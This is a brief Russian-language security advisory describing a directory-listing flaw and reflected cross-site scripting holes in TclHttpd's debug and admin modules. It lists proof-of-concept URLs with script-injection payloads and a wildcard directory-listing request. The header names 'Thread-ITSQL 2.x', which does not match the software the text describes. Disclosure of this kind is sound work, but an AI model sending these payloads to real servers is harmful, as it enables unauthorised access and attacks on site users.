Программа: Thread-ITSQL 2.x
Несколько уязвимостей обнаружено в TclHttpd. Удаленный пользователь может просматривать содержание директорий на уязвимой системе. Удаленный пользователь может выполнить XSS нападение.
1. Сценарий 'dirlist.tcl' не фильтрует данные, представленные пользователем, при отображении содержания директорий.
http://[target]/images/?pattern=/*&sort=name
2. Несколько модулей (Debug, Status, Mail, и Admin) не фильтруют данные, представленные пользователем:
http://[target]/debug/echo?name=<script>alert('hello');</script>
http://[target]/debug/dbg?host=<script>alert('hello');</scri pt>
http://[target]/debug/showproc?proc=<script>alert('hello');</script>
http://[target]/debug/errorInfo?title=<script>alert('hello');</script>
